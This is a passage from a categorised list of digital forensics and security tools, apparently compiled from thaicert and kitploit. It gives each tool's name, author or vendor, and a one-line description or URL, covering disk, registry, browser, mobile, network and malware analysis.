MetaExtractor	4Discovery	Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTview	Sanderson Forensics	Displays and decodes contents of an extracted MFT file
NetSleuth	NetGrab	Network monitoring tool, with covert “silent port scanning”
PictureBox	Mike’s Forensic Tools	Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
PsTools	Microsoft	Suite of command-line Windows utilities
Shadow Explorer	Shadow Explorer	Browse and extract files from shadow copies
Simple File Parser	Chris Mayhew	GUI tool for parsing .lnk files, prefetch and jump list artefacts
SQLite Manager	Mrinal Kant, Tarakant Tripathy	Firefox add-on enabling viewing of any SQLite database
Strings	Microsoft	Command-line tool for text searches
Structured Storage Viewer	MiTec	View and manage MS OLE Structured Storage based files
Switch-a-Roo	Mike’s Forensic Tools	Text replacement/converter/decoder for when dealing with URL encoding, etc
Windows File Analyzer	MiTeC	Analyse thumbs.db, Prefetch, INFO2 and .lnk files

Mac OS tools

Name	From	Description
Audit	Twocanoes Software	Audit Preference Pane and Log Reader for OS X
Disk Arbitrator	Aaron Burghardt	Blocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration
Epoch Converter*	Blackbag Technologies	Converts epoch times to local time and UTC
FTK Imager CLI for Mac OS*	AccessData	Command line Mac OS version of AccessData’s FTK Imager
IORegInfo	Blackbag Technologies	Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
Mac Memory Reader	Cyber Marshal	Command-line utility to capture physical RAM from Mac OS systems
PMAP Info*	Blackbag Technologies	Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors

Mobile devices

Name	From	Description
iPhone Analyzer	Leo Crawford, Mat Proud	Explore the internal file structure of Pad, iPod and iPhones
ivMeta	Robin Wood	Extracts phone model and software version and created date and GPS data from iPhone videos.
Rubus*	CCL Forensics	Deconstructs Blackberry .ipd backup files
SAFT	SignalSEC Corp	Obtain SMS Messages, call logs and contacts from Android devices
WhatsApp Forensics	Zena Forensics	Extract WhatApp messages from iOS and Android backups

Data analysis suites

Name	From	Description
Autopsy	Brian Carrier	Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
Backtrack	Backtrack	Penetration testing and security audit with forensic boot capability
Caine	Nanni Bassetti	Linux based live CD, featuring a number of analysis tools
Deft	Dr. Stefano Fratepietro and others	Linux based live CD, featuring a number of analysis tools
Digital Forensics Framework	ArxSys	Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Forensic Scanner	Harlan Carvey	Automates ‘repetitive tasks of data collection’. Fuller description here
Paladin*	Sumuri	Ubuntu based live boot CD for imaging and analysis
SIFT*	SANS	VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
The Sleuth Kit	Brian Carrier	Collection of UNIX-based command line file and volume system forensic analysis tools
Ubuntu guide	How-To Geek	Guide to using an Unbuntu live disk to recover partitions, carve files, etc.
Volatility Framework	Volatile Systems	Collection of tools for the extraction of artefacts from RAM

File viewers

Name	From	Description
Microsoft PowerPoint 2007 Viewer	Microsoft	View PowerPoint presentations
Microsoft Visio 2010 Viewer	Microsoft	View Visio diagrams
VLC	VideoLAN	View most multimedia files and DVD, Audio CD, VCD, etc.

Internet analysis

Name	From	Description
Chrome Session Parser	CCL Forensics	Python module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”)
ChromeCacheView	Nirsoft	Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache
Cookie Cutter	Mike’s Forensic Tools	Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
Dumpzilla	Busindre	Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
Facebook Profile Saver	Belkasoft	Captures information publicly available in Facebook profiles.
IECookiesView	Nirsoft	Extracts various details of Internet Explorer cookies
IEPassView	Nirsoft	Extract stored passwords from Internet Explorer versions 4 to 8
MozillaCacheView	Nirsoft	Reads the cache folder of Firefox/Mozilla/Netscape Web browsers
MozillaCookieView	Nirsoft	Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers
MozillaHistoryView	Nirsoft	Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page
MyLastSearch	Nirsoft	Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFox	Nirsoft	Extracts the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheView	Nirsoft	Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
OperaPassView	Nirsoft	Decrypts the content of the Opera Web browser password file, wand.dat
Web Historian	Mandiant	Reviews list of URLs stored in the history files of the most commonly used browsers
Web Page Saver*	Magnet Forensics	Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages

Registry analysis

Name	From	Description
ForensicUserInfo	Woanware	Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
Process Monitor	Microsoft	Examine Windows processes and registry threads in real time
Registry Decoder	US National Institute of Justice, Digital Forensics Solutions	For the acquisition, analysis, and reporting of registry contents
RegRipper	Harlan Carvey	Registry data extraction and correlation tool
Regshot	Regshot	Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
sbag	TZWorks	Extracts data from Shellbag entries
USB Device Forensics	Woanware	Details previously attached USB devices on exported registry hives
USB Historian	4Discovery	Displays 20+ attributes relating to USB device use on Windows systems
USBDeview	Nirsoft	Details previously attached USB devices
User Assist Analysis	4Discovery	Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
UserAssist	Didier Stevens	Displays list of programs run, with run count and last run date and time
Windows Registry Recovery	MiTec	Extracts configuration settings and other information from the Registry

Application analysis

Name	From	Description
Dropbox Decryptor*	Magnet Forensics	Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Google Maps Tile Investigator*	Magnet Forensics	Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
KaZAlyser	Sanderson Forensics	Extracts various data from the KaZaA application
LiveContactsView	Nirsoft	View and export Windows Live Messenger contact details
SkypeLogView	Nirsoft	View Skype calls and chats

Abandonware

Name	From	Description
DCode	Digital Detective	Converts various data types to date/time values
iPhone Backup Browser	Rene Devichi	View unencrypted backups of iPad, iPod and iPhones
ChromeAnalysis	Foxton Software	Analysis of internet history data generated using Google Chrome
IEHistoryView	Nirsoft	Extracts recently visited Internet Explorer URLs

Domain and IP address query tools
DomainTools	https://www.domaintools.com
Domain Dossier	http://centralops.net/co/DomainDossier.aspx
IP to ASN Mapping	http://www.team-cymru.org/IP-ASN-mapping.html
GeoLite2	http://dev.maxmind.com/geoip/geoip2/geolite2/
RIPEstat	https://stat.ripe.net
E-mail header analysis tools
Google Apps Messageheader	https://toolbox.googleapps.com/apps/messageheader/
MXToolbox	http://mxtoolbox.com/EmailHeaders.asp
Network monitoring tools
nfdump	http://nfdump.sourceforge.net/
nfsen	http://nfsen.sourceforge.net/
Network auditing tools
nmap	https://nmap.org/>
AutoScan-Network	http://autoscan-network.com/
Wireshark	https://www.wireshark.org/
AbuseHelper	https://github.com/abusesa/abusehelper>
Vulnerability assessment tools
Nessus	http://www.tenable.com/products/nessusvulnerability-scanner
Metasploit	https://www.metasploit.com
Vega	https://subgraph.com/vega/index.en.html
OWASP ZAP	https://www.owasp.org/index.php/OWASP_Zed_ Attack_Proxy_Project
SQLcheck	http://www.softpedia.com/get/Internet/Servers/ Database-Utils/SQL-Check.shtml
Burp Suite	https://portswigger.net/burp/
Kali	https://www.kali.org/
Intrusion detection tools
Snort	https://www.snort.org/
Tripwire	https://sourceforge.net/projects/tripwire/
Forensic tools
Sleuth Kit	http://www.sleuthkit.org/
Autopsy	http://www.sleuthkit.org/autopsy/
Tcpxtract	http://tcpxtract.sourceforge.net/
EnCase	https://www.guidancesoftware.com/encaseforensic
FTK, Forensic Toolkit	http://accessdata.com/solutions/digital-forensics/ forensic-toolkit-ftk
Malware analysis tools
VirusTotal	https://www.virustotal.com/
Malware Domain List	http://www.malwaredomainlist.com
Malware Hash Registry	http://www.team-cymru.org/MHR.html
MISP, Malware Information Sharing Platform	https://misppriv.circl.lu
AlienVault Open Threat Exchange	https://otx.alienvault.com
Malwr	https://malwr.com/
Honeypots
honeyd	http://www.honeyd.org/index.php
WiFi tools
inSSIDer	http://www.metageek.com/products/inssider/
Acrylic WiFi Scanner	https://www.acrylicwifi.com/en/wlan-software/wlan-scanner-acrylic-wifi-free/
SIEM tools
Splunk	http://www.splunk.com
Encryption tools
GnuPG	https://www.gnupg.org/
VeraCrypt	https://veracrypt.codeplex.com/
Incident-tracking tools
RTIR	https://bestpractical.com
OTRS	https://www.otrs.com/
Databases
SQLite	https://www.sqlite.org/
MySQL	https://www.mysql.com/
PostgreSQL	https://www.postgresql.org/
ที่มา: thaicert   kitploit #WindowsForensic #computerforensic #ComputerForensics #dfir #forensics#digitalforensics #investigation #cybercrime  #fraud #Cyber Forensic เครื่องมือ